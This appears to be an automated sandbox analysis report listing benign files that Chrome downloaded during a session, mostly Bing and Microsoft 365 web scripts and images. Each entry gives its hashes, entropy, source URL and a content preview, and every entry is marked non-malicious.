                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1225), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1225
                                                                                                    Entropy (8bit):5.141811507851455
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:uXpw1mF48CYXbScfnkRXjRVaOvNm8XHV8FCeOOF1x3AE:ug8bbSukRtFVh1pC7QE
                                                                                                    MD5:32A234383EA9C16D420FC8C5B5F97C15
                                                                                                    SHA1:EB38A1729DB3951F83C691C5F3EA6D6B280BC31C
                                                                                                    SHA-256:52B60618463CD558429AB7BE5E76ECF619883437694C2A4B83A3D26B345C2785
                                                                                                    SHA-512:86190B0A611DDFB543B6A0A3F26501876334EC6C4A862624AA3D5716426B1D24741CE679A7BA32BC220E2AB797DF9402A97A92BFC12C6F80986B1FECCF9A76AF
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/6zihcp2zlR-DxpHF8-ptaygLwxw.js
                                                                                                    Preview:var RewardsIdleTabTracker;(function(n){var i,r=0,e=!1,u=!1,f;n.init=function(n){var f;if(!n||Object.keys(n).length===0){Log.Log("Info","RewardsIdleTabTracker","emptyJsonDataProvided",!1);return}if(r=parseInt(n.TimeoutMilliseconds),!r){Log.Log("Info","RewardsIdleTabTracker","timeoutMillisecondsMissing",!1);return}s();sj_be(_d,"mousemove",t);sj_be(_d,"click",t);sj_be(_d,"keypress",t);sj_be(_d,"scroll",t);sj_be(_d,"touchstart",t);var e=n.ShouldLogActivity===!0,i=parseInt(n.LogInterval),u=parseInt(n.MaxLogTimeoutMilliseconds);e&&i&&u&&(f=setInterval(h,i),setTimeout(function(){return clearInterval(f)},u))};var t=function(){clearTimeout(i);f=new Date;u||(i=setTimeout(o,r))},o=function(){u||(sj_evt.fire("idletabactivated"),u=!0,Log.Log("Info","RewardsIdleTabTracker","idleTabEventFired",!1),clearTimeout(i),sj_ue(_d,"mousemove",t),sj_ue(_d,"click",t),sj_ue(_d,"keypress",t),sj_ue(_d,"scroll",t),sj_ue(_d,"touchstart",t))},s=function(){e||(Log.Log("Info","RewardsIdleTabTracker","idleTabTrackerInit
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1937), with no line terminators
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1937
                                                                                                    Entropy (8bit):5.461252594947073
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:qYe3k+th+DNfxe2K9vdjmM0QVV9yTRKcDi4:hskXDuf9FmM0AP0LJ
                                                                                                    MD5:BA408C0E6B5F707319A057CF7CE3B4A7
                                                                                                    SHA1:BE42A50E853218E2F83DE38ACC3640C59225CFAF
                                                                                                    SHA-256:E64BDB46CBCAB956F480728DC1DC3AFB17C2C37F20886721246C101F24C3E03F
                                                                                                    SHA-512:6E64BD4A0F7E21C3551183960D88536D0613E617EE186AB52A2E679FA702B08230BBD2CB292A5602D13407DA7280A362FB46FCB15A40F3F77DE55BAE1C41754C
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://r.bing.com/rp/vkKlDoUyGOL4PeOKzDZAxZIlz68.js
                                                                                                    Preview:var WV=WV||{};(function(n){function u(){if("webVitals"in _w&&(!("isInit"in n)||!n.isInit)&&typeof sj_evt!="undefined"&&typeof sj_be!="undefined"){var t=_w.webVitals;n.onFCP=i(t.onFCP);n.onLCP=i(t.onLCP);n.onCLS=i(t.onCLS);n.onINP=i(t.onINP);n.metrics={};n.isMetricsFrozen=!1;n.isLogged=!1;sj_evt.bind("onP1",f,!0);sj_evt.bind("ajax.requestSent",h)}}function f(){if(!n.isInit){n.onFCP(e);n.onLCP(t);n.onCLS(t);n.onINP(t);n.isInit=!0}}function e(i){n.isFCPCalledOnce||(n.isFCPCalledOnce=!0,sb_st(function(){sj_be(_d,"visibilitychange",o);sj_be(_w,"pagehide",s)},0),t(i))}function o(){"visibilityState"in _d&&_d.visibilityState==="hidden"&&r()}function s(){r()}function h(){r();l()}function c(){n.isLogged=!1;n.metrics={}}function t(t){var i;switch(t.name){case"FCP":i=parseInt(t.value);break;case"LCP":i=parseInt(t.value);break;case"INP":i=parseInt(t.value);break;case"CLS":i=parseFloat(t.value).toFixed(4)}i&&n.metrics[t.name]!=i&&(n.metrics[t.name]=i,n.isLogged=!1)}function r(){!n.isLogged&&!n.isMet
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1391
                                                                                                    Entropy (8bit):4.796412914000846
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:t4LxSdeBU4dxCey0fA53J/S/7/sG5BmefEqrR5GTGOby2NF2E/:+xSUBU4S55Z/aB5BmefEqrRYK6
                                                                                                    MD5:620580657E8A45B4A7B8450B8DA5CD32
                                                                                                    SHA1:922187F6E9192BA43886FB43B70C15735CAFB9E8
                                                                                                    SHA-256:91DE3100632E986CDB6897793EF1B2A8655B15ED4145098CA489856C043D207E
                                                                                                    SHA-512:F3CE71CD92BA2C6ABD6CDEE48F677522439CAD023042D56728E5CB2DED5EC51D1170308FB1524C4A352AC6C5E4E514147D21B99667CCE54CE35A73D91DD27E4B
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 40 40" width="64" height="64">.. <style type="text/css">.. .anim {.. animation-name: blink;.. animation-duration: 1s;.. animation-iteration-count: infinite;.. fill: #05E9F5;.. transition-timing-function: linear;.. }.. @keyframes blink {.. 0% {.. opacity: 0.. }.. 50% {.. opacity: 1.. }.. 75% {.. opacity: 1.. }.. 100% {.. opacity: 1.. }.. }.. .delay1 {.. animation-delay: 0s;.. }.. .delay2 {.. animation-delay: .125s;.. }.. .delay3 {.. animation-delay: .25s;.. }.. .delay4 {.. animation-delay: .375s;.. }.. .delay5 {.. animation-delay: .5s;.. }.. .delay6 {.. animation-delay: .675s;.. }.. .delay7 {.. animation-delay: .75s;.. }.. .delay8 {.. animation-delay: .875s;.. }.. </style>.. <circle class="delay1 anim" cx="20" cy="8" r="3" />.. <circle class="delay5 anim"
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (30635)
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):30687
                                                                                                    Entropy (8bit):5.2769084538455076
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:42P2k0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:4Ih0S0/ks2JdImYFcw662A86vzyR
                                                                                                    MD5:1CCE752051FC076EB20177DC6AAF712F
                                                                                                    SHA1:0045AB728A9B8869223D9E6EBB8DA9A3A5A88941
                                                                                                    SHA-256:0E7F3BBE4003CFF6D1EEA624AAF8B3F6BCB36E7F6019D5DA88C21B42421180BD
                                                                                                    SHA-512:6A6ABAA0C515550E8FD0B08DB34FE3955033240F2AF4255838CDEE2EF4307EBBBED1E1A45CB73AC218117B58A1CD9DFBC77F8A27196586F8DB1C1DF88FB7A0A8
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://mem.gfx.ms/meversion?partner=office&market=en-us&uhf=1
                                                                                                    Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":true,"graphinfo":{"graphclientid":"7eadcef8-456d-4611-9480-4fff72b8b9e2","graphscope":"user.read","graphcodeurl":"https://login.microsoftonline.com/common/oauth2/v2.0/authorize","graphredirecturi":"https://amcdn.msftauth.ne
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1048), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1048
                                                                                                    Entropy (8bit):5.307685089767312
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:/sfRW6p2ZQtBH6X3xuvM0Ry9kfr9VH4HPsRWVVcysewnRk15PdFFSZC8:/ww82ZtHxuvHfr9l4H0wsys/RkTPLk08
                                                                                                    MD5:56E8BADE1AFF1AE713AC7F9750A01C3B
                                                                                                    SHA1:11563339BE06540F41CB26F460E459E5CCDF6F54
                                                                                                    SHA-256:14F8C440DABB87A33C67D911241559B21047F052183261F6B942B0136F4F94AA
                                                                                                    SHA-512:D655BA27F3B02344837A56699947574C2F397C54F1BF10E75569A93F174EA16BAFB4D8A0C04BF3866F1E3F9D5A3FCCD6CC7173E134FDC6728793CE0F33ADE358
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:var captionImageOverlay;(function(){function f(){var f,t=(f=_d.getElementsByClassName("b_greyBackgroundModal"))===null||f===void 0?void 0:f[0],n=_d.querySelectorAll(".b_ci_image_ova"),e=Array.prototype.slice.call(_d.querySelectorAll(".b_imgcap_coll .b_ci_image_ova")),r,u;if(t!=null&&n!=null){for(r=0;r<(n===null||n===void 0?void 0:n.length);r++)u=n[r],e.includes(u)?i(u,t,!0):i(u,t);t.addEventListener("click",function(){return!1})}}function i(i,f,e){e===void 0&&(e=!1);i.addEventListener("click",function(o){sj_pd(o);var s=i.getAttribute("aria-label");if(!s)return!1;f.style.display="block";sj_evt.bind(n,r);sj_evt.fire(u,s);_w.sj_log&&sj_log(t,"OverlayImageClick",e?"RCLIDPShowed":"RCIDPShowed")})}function r(){var i,u=(i=_d.getElementsByClassName("b_greyBackgroundModal"))===null||i===void 0?void 0:i[0];if(u==null)return!1;u.style.display="none";_w.sj_log&&sj_log(t,"ImageDetailPageClose","RCIDPClosed");sj_evt.unbind(n,r)}var u="IFrame.Navigate",n="IFrame.Close",t="CI.CaptionImageOverlay";f()}
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 2500 x 828, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):1568713
                                                                                                    Entropy (8bit):7.994353727710284
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:24576:+SlEJttUZ+N7R8NrWZaF2sTAHPapdyjLLb7pFhO0+juu1nwdYAfnJ:+Qw8IcrSawsTMjLTpPj
                                                                                                    MD5:7BF078A5F39C15673178E3C77EBDFBCE
                                                                                                    SHA1:3FEAC213FCA05D4811FA705C60D726F5DC81B06D
                                                                                                    SHA-256:7C5FBD491C8E2916ACDB0955EC27F21E6C933860B33626FD1DED5486816BDD35
                                                                                                    SHA-512:CD621836F8420630E1A1A1B0F5BACDBFACB6C3FAC6CD9F93CF0500C5F3C05B8485C7CF0AF9CCE3F5025399FCC718EB0C8318C4E28174742D920D50022490FECE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/m365-rebrand-value-edu-mreb-7bf078a5f3.png
                                                                                                    Preview:.PNG........IHDR.......<.....s.1.....pHYs.................sRGB.........gAMA......a....^IDATx...Y.%Iz....1.i...s........@.8..}(RF3]Qf}...f4.Q...?A7.L...tA...e..%..I:.....Q...Du.9.yXcD....=.#..U...Px...k..<<<<<v.....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 80x80, components 3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3616
                                                                                                    Entropy (8bit):7.872687999074232
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9xFuERABNMcKElw0gPsKjANckY2vRH59Hs0O038L7kiqoUkonu4xA1yZM74DH:TME77Z0NLPvN5rANqoUc/yZ04r
                                                                                                    MD5:F2E57B8353E0EBE5E4D8D6FE0C86F971
                                                                                                    SHA1:C6B3BE1653EAB63214E0791D8696C8866D29426B
                                                                                                    SHA-256:F0667DBC0828D6FA3FC276376D8F0D86E36DE6D5CD73A6635A60BC03916ED020
                                                                                                    SHA-512:07B7EC067AAB0FA904305B810729FAE9E25307898921EFA9A1C2447CA28A1702304F590A5A6BA7D1CC547AB8727D89BAB9386C669C264C5E6C8666ED1AB92498
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:......JFIF.....`.`.....C....................................................................C.......................................................................P.P.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...i_..X..#..0...F?Gu..X][J...W.7Q.Mkp.e....H.;..._qq.+.?.p.......S...U.YNk_.RQ..G.|G.ap.aR.i.m....n TT...U{.w.6:..q.."...'+......9.8...-.....n.O..A...#=..O.$/..E.B.s...>n....8.p..g..5...e&.../...;..x....).6.(.i..&...._i.Ch.$XG<)..z..1\H..".|...J.7.H....r..~....?..H.eS...`..|.|.>.$$....1.1#..J<Y.S.....g(......N.....&q..e.....I>,.]7lf]....Z.y.X(U'.2..+.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (42133)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):138268
                                                                                                    Entropy (8bit):5.224497765711851
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:1f4HuF7pxnISnJ9d1EwgXA7CisuMK/xw/:1f4Hu1I+Tw/
                                                                                                    MD5:5B85413B96AF340238B93068CDB641FB
                                                                                                    SHA1:D949C985DF4F80FAB0CF036A1DD86C63CA342F1F
                                                                                                    SHA-256:1B448C19C6DF1F2D15399A710A73BB3EC0C5233B571CDFAE9CCA315E6E13FB85
                                                                                                    SHA-512:5B7E26BB4C72A8D8EE6CD20EEEA354ADD396F74289BD3E42CD1D6C8A5D3FA1B190CC62B953CAF4FA38EFDA0983F90F937276C8797EB2E1BADC11F9F5161117CE
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){/**. * @license almond 0.3.3 Copyright jQuery Foundation and other contributors.. * Released under MIT license, http://github.com/requirejs/almond/LICENSE. */.var requirejs,require,define,__extends;(function(n){function r(n,t){return w.call(n,t)}function s(n,t){var o,s,f,e,h,p,c,b,r,l,w,k,u=t&&t.split("/"),a=i.map,y=a&&a["*"]||{};if(n){for(n=n.split("/"),h=n.length-1,i.nodeIdCompat&&v.test(n[h])&&(n[h]=n[h].replace(v,"")),n[0].charAt(0)==="."&&u&&(k=u.slice(0,u.length-1),n=k.concat(n)),r=0;r<n.length;r++)if(w=n[r],w===".")n.splice(r,1),r-=1;else if(w==="..")if(r===0||r===1&&n[2]===".."||n[r-1]==="..")continue;else r>0&&(n.splice(r-1,2),r-=2);n=n.join("/")}if((u||y)&&a){for(o=n.split("/"),r=o.length;r>0;r-=1){if(s=o.slice(0,r).join("/"),u)for(l=u.length;l>0;l-=1)if(f=a[u.slice(0,l).join("/")],f&&(f=f[s],f)){e=f;p=r;break}if(e)break;!c&&y&&y[s]&&(c=y[s],b=r)}!e&&c&&(e=c,p=b);e&&(o.splice(0,p,e),n=o.join("/"))}return n}function y(t,i){return function(){var r=b.call(arguments,0
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):15406
                                                                                                    Entropy (8bit):4.967552114438246
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:2xApRWtvbsjgIYYQlV47U/1z8QsCj99/R1qa/PRZs6M75m4vU6GCi28urvZQYH3:FRIwcVeq8wjjLENG72tl
                                                                                                    MD5:31D62B976C16DB52CBF0D5631BCDE62C
                                                                                                    SHA1:18F2D0B838D766B642E787E222075DDFF5285662
                                                                                                    SHA-256:04663FB0B01FC27B402519F0B000DB2B98EF3754C8C99C21E304262D2353AB62
                                                                                                    SHA-512:104E20B3977B6ADAF6847D62199656A4E93CA3478D78335DBA65B807C4375E8AA3FB41BD12B3EA0CF11C689C21BC1486DA063415372F4AD090D95DC2517880E1
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://res.cdn.office.net/officehub/images/content/images/favicon_m365-31d62b976c.ico
                                                                                                    Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ....................................................o..o.z.................................................v.........{...u.v.m.................................O.................y...r...l..g.O.................x...n!..c...a/..............w...o...h...c..._...Zx..........z9..v-..q!..h...^...b:..~.......t...j...c...^...Z}..Wz..........zH..zE..y<..u...o!..f..W.a.|.a.n..c...\...Xy..Uv..Tq..........zS..{T..{T..{Q..yG..v...........d...Y{.Tu..Po..Kh..t\..........{`..|b..|e..|i..|n..................Mk..If..C]..lS...P..........{l..|p..|u..}}..}.z.................C^z.ST..O...O...O..........}x..}|..}...}...mw..I7...........N..L...M...M...N...N..........}...}...}...~...ag..\9..xC..G..I..K...K...L...M...N..........}...}...~...~...ak..^:..{C..F..H..I..K..K...L...M..........x...}...~.......bl.._;..|C..F...G..I..J..K..K...K..................~.O....gt..a;..}C..F..G..H..I..JO......................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 197x113, components 3
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):3916
                                                                                                    Entropy (8bit):7.876964509090141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:EkT4b5q3IGOh8mKJwGvCkxeC5cg8L6aVLjjB:h5IFO7euvxeCevVjjB
                                                                                                    MD5:D03BDCFC68ACAB3B77AA1C3BF8B9CEA7
                                                                                                    SHA1:36C4F21F1F2FC8BF4B1B7E0E0BAFFB6A502BB254
                                                                                                    SHA-256:929A95BBEFF072800A15E701B73843B5C5AD856112B02D1A59857CFD8E577D96
                                                                                                    SHA-512:80EED277402400E454DCCAD6D6A69D5701AFBC1B158EC324AF27BD14E7CFA5961747A07B5851D795BDFC5EEAF1BE10DD8BF91183E5010C5A854D78C372812463
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ORMS.a9a7e9af523d45c0c9a57b7d9fba35e2&w=197&h=113&c=6&rs=2&o=6&pid=Wdp
                                                                                                    Preview:......JFIF...................................."....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............................"....."3 % % 3-7,),7-Q@88@Q^OJO^qeeq............q...."....................................................!...d..GI.\....@A..Yz.j......U.....#/fY`)U... 1[.q...5.1%F....i..i.H-0....q....{9..^..c...4.W...W.].n/.Ty...b...i.1..u1...|.........B....D...M.o........;9.../....5;6..e..Uh....yO...5.v..+......-..s....zX...f:.W.e.$.#..sO..5p.Dc.\..&:.L$8).AW.......)..)p......."...6....wwr......K.........................................@....'_G<..[.D..n,.yX..<..qJ...;...W2..z.H..;y3...._[....{...|C^}.L......_/...Zy...-5-<v.3.....M.!E.c..F..`!..O...:........................!.1.."AQq...2a..BRS.. 3b.#CDr4s.........?..|.I...N..9..l..i..yf.r...E'qSL^.Ull.}H$..S.B...za.f....O.V....~..A....{...n.....>.E....q..,(.qW..4..>$Q].G.o.y.n.[b.|..@.H.o..$O#.A.~. ..'...!C(...jQ.@<.!.ix..;.::..W!.@....{u</m..i$..U..(.2I.}}>= 8....6.,?......#.]r..\...`E........7G...y.4./X..V....
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):209
                                                                                                    Entropy (8bit):6.257245349235395
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPl3xWrE9/gnbBE1d7snLQNylzkIgDhqo/1ir1216rTmVN80S+st2up:6v/lhPKwCnFGgQNyld+/ou6Hp0NsTp
                                                                                                    MD5:7D4555B1487EC50930C7567B2690BF10
                                                                                                    SHA1:544C4B9A47D0D12FD38FDC07900D32D31C0F600F
                                                                                                    SHA-256:50BBDF35A7DE6804B4E50971D7E3656D6C8100E4A03CF935F841D0AFD47D8371
                                                                                                    SHA-512:F293E1F06C7244C2FD080A65C3A32D134A6AF23E9148B8A391E242D8EA36297FFE8C500903B9B65A6E450EB1731ECF28CBE0A67F6E246938501BEBDDA5A6B177
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.33c6a76b-616a-4fc5-ac11-7a644a97dc30&w=32&h=32&qlt=97&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J....sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:downloaded
                                                                                                    Size (bytes):584
                                                                                                    Entropy (8bit):7.3756349937938515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iwkF9d1ZiK+j8toHwxtsjsXGDTygIk2KdC0sW8RuJbu1:HnAHQOTdIGdC0b8RuBu1
                                                                                                    MD5:46EE8FAD6E954D4C6869A9D912E54178
                                                                                                    SHA1:C75DEE3ABFB1E4A480667CF72B7CD6F794C2201A
                                                                                                    SHA-256:D997B0C72B7A2265D7A9B60C6D573EE17B51E17A1DF42FF3C295BABD9B28F6FA
                                                                                                    SHA-512:A64D949D3B9465F0C6D5CEAFD605B47A22AA8896C1855D7A756A17647328AA78E93E96DF7738E3388334B0F9C7DD951DDB3F6CBC5E20A5EC98D0708CBDA8C0E2
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    URL:https://th.bing.com/th?id=ODLS.9d837793-b21b-4809-aceb-f60f4a0b6408&w=32&h=32&qlt=99&pcl=fffffa&o=6&pid=1.2
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....gAMA......a.....pHYs..........(J.....IDATXG..m.P.F...........2BV..L.{f..I{(.2...JZ...Q.6...r...|..d..\..a.V.....?, 2.....C@]..(............|.n..v.^.gk....[..S.......,.8....}..l..}xO0..6 ...g- ...nz/.P..cm.g...I.'6..*..m.6q.\..`7#.if.B.I...CH..*.U...?.}[.~Q... ..e.@.v`=..-....f......|#?.ld.P....e.V.e..RVI....)@.;.L.3.=;....`!B..Q...CXv.D*.tCF.$P.#...F.X.....0.d...Hk..l.E...[f.S..+ ..H....)....S..G.+....gS...1.....sm...v4-....|....X....%@.-.....]<.]....yv3.-..1.=b...@+.....|.n.G.....H+r8.1.rE....f\......p/......IEND.B`.
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):256
                                                                                                    Entropy (8bit):5.688396110170015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPKLMR/C+wACgQNyld+/ou6Hp0NsT:6v/7iQ/WXuJ0
                                                                                                    MD5:59C20BA187FD2EF84124F13177CD0F2B
                                                                                                    SHA1:0C1655BFD5B1A1234662288B8A5AF1A29E3EB05A
                                                                                                    SHA-256:DB1E4BD6D917C0D899EA00B28549F5A1DC963E0A1ECAB968D0633068153937A8
                                                                                                    SHA-512:A3791F3AC0D8F67FF09E64A8A11D773776A1B2B13B453E874EE2889290E0167D9667659089013F0EEFAA25A59858E974FDBA3A9EA26A04E4B02BB7777212A21D
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATXG....0...7...#.}$.....N..bu...,.....>>.mm....8....K....@....NW..n......cL..7....0....\...v.k.. ......`x....GT..{....IEND.B`...................................
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (1663), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1663
                                                                                                    Entropy (8bit):5.118614360470706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:2QAKJFFGRc/spJg2WNaQorUcn7RzdAHWd3TRdZhtRkYAe/V5r0nA97StrLntMPU6:wKJFkimqjcrw4D/tD9VWcS1etkEy96vZ
                                                                                                    MD5:D81844C2EBCF5F3260A692E3E89DDE7F
                                                                                                    SHA1:5A3874FB9F597E42FDD94E5BC5DA0A709B70D57A
                                                                                                    SHA-256:9905F086F3F40AC4B8EC2C9F0752A157ED637B2FFC2C87971E8306D6CB12FE9F
                                                                                                    SHA-512:8005F3EBD5BC8DC903917DF581563595EA3E427F31992260AA4E6ED8BC30095442174AD153A83C378575FFB2DE878338B0E87D8CDD57DFDC49E646CA9E4ADA77
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:(function(){function v(){n&&(sj_be(_d.body,"click",y),sj_be(n,"click",p),f&&sj_be(f,"click",w),sj_evt.bind("PrimaryNavDropdownMenuShow",i),sj_evt.bind("scs_openflyout",i))}function y(){typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)&&i()}function p(r){r.stopPropagation();typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,t)?i():b()}function w(n){n.stopPropagation();var t=s(n.target);t!=null&&Log&&Log.Log&&Log.Log("Click",u,"ScopeDropdownMenuItemClick",!1,"ItemId",t.id);c.trigger(i,null)}function s(n){return n===null?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,e)||Lib.CssClass.contains(n,"b_sp_over_cont")?null:typeof Lib.CssClass!="undefined"&&Lib.CssClass.contains(n,a)?n:n.parentElement?s(n.parentElement):null}function b(){sj_evt.fire("ScopeDropdownMenuShow");typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(n,t);r&&typeof Lib.CssClass!="undefined"&&Lib.CssClass.add(r,o);Log&&Log.Log&&Log.Log("Show",u,"ScopeDropdownMenuShow");n.setAttribute("aria
                                                                                                    Process:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    File Type:ASCII text, with very long lines (3390), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3390
                                                                                                    Entropy (8bit):5.369380472284444
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:JQcrkTDZV7e2maeaa5/m4ynBbiMkA03RQqsh+4BQYiGxJ:JvkPre2mXr/+nBbwkh7vxJ
                                                                                                    MD5:6DB01A1BC27DEFB51547AD281BC57772
                                                                                                    SHA1:A6D8101B037CEC5DABB80A1568329B58123281AA
                                                                                                    SHA-256:A6347B4C2628CEDFEB5757743849800BCCE481B54A8D351C2FC1F9B80D3D4C81
                                                                                                    SHA-512:E9788EA55EFCA965FEA742CA85DF982416CD7ABBD4439E19781C47235199B2DA5832F70393C1066117DB1FE3FB2A9B873E7F298D7F15E193E313ED4ED36AF868
                                                                                                    Malicious:false
                                                                                                    Reputation:low
